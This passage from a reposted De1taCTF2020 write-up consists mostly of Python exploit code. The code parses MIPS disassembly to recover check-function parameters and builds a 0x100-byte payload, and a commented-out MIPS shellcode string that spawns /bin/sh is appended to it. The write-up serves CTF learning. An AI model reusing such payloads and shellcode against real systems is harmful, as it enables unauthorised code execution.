parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x30                else:                    parameters.append(u"0")                    parameters.append(u"0")                    para_offset += 0x28                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x24                else:                    parameters.append(u"0")                    parameters.append(u"0")                    para_offset += 0x1c                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x2c                else:                    parameters.append(u"0")                    parameters.append(u"0")                    para_offset += 0x24                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    parameters.append(curr_ins[1].split(", ")[-1])                else:                    parameters.append(u"0")                    parameters.append(u"0")                type3[func_addr] = parameters                pass            # type 4            elif instructions[func_addr + 0x9c][0] == u"jal" or instructions[func_addr + 0x9c + 4][0] == u"jal":                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x10                else:                    parameters.append(u"0")                    para_offset += 0xc                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x10                else:                    parameters.append(u"0")                    para_offset += 0xc                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x10                else:                    parameters.append(u"0")                    para_offset += 0xc                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                type4[func_addr] = parameters                pass            # type 5            elif instructions[func_addr + 0x190][0] == u"jal":                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x24                else:                    parameters.append(u"0")                    para_offset += (0x24 - 8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x38                else:                    parameters.append(u"0")                    para_offset += (0x38 - 0x8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x24                else:                    parameters.append(u"0")                    para_offset += (0x24 - 8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                else:                    parameters.append(u"0")                    #######################                para_offset = func_addr + 0xd0                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x24                else:                    parameters.append(u"0")                    para_offset += (0x24 - 8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x38                else:                    parameters.append(u"0")                    para_offset += (0x38 - 0x8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x24                else:                    parameters.append(u"0")                    para_offset += (0x24 - 8)                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x34                else:                    parameters.append(u"0")                    para_offset += 0x2C                type5[func_addr] = parameters                if 'beq' in instructions[func_addr + 0xc4][0]:                    parameters.append(False)                else:                    parameters.append(True)                if 'beq' in instructions[func_addr + 0x17c][0]:                    parameters.append(False)                else:                    parameters.append(True)                pass            # type 6            else:                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc + 8                else:                    parameters.append(u"0")                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x14                else:                    parameters.append(u"0")                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x8                else:                    parameters.append(u"0")                    para_offset += 0x4                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x8                else:                    parameters.append(u"0")                    para_offset += 0x4                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                type6[func_addr] = parameters    result = []    for x in check_functions[::-1]:        if x in type1:            result.append(p32(case1(map(int, type1[x]))))        elif x in type2:            result.append(p32(case2(map(int, type2[x]))))        elif x in type3:            result.append(p32(case3(map(int, type3[x]))))        elif x in type4:            result.append(p32(case4(map(int, type4[x]))))        elif x in type5:            # print map(int, type5[x]), hex(x)            # print hex(x)            result.append(p32(case5(map(int, type5[x]))))        elif x in type6:            result.append(p32(case6(map(int, type6[x]))))    payload = "".join(result).ljust(0x100, "x00")    return payload# shellcode = "x00x01x06x24xdcxffxffx27x08x00xe0x03x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xffxffx06x28xffxffxd0x04xe0xffxbdx27x18x00xe4x27xe8xffxa4xafxecxffxa0xafxe8xffxa5x23xabx0fx02x24x0cx01x01x01/bin/sh"# print generatePayload("real_code") + "AAAABBBB" + shellcode

本文始发于微信公众号(谢公子学安全):De1taCTF2020 部分Writeup

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  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
  • 本文由 发表于 2022年3月1日10:42:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   De1taCTF2020 部分Writeup


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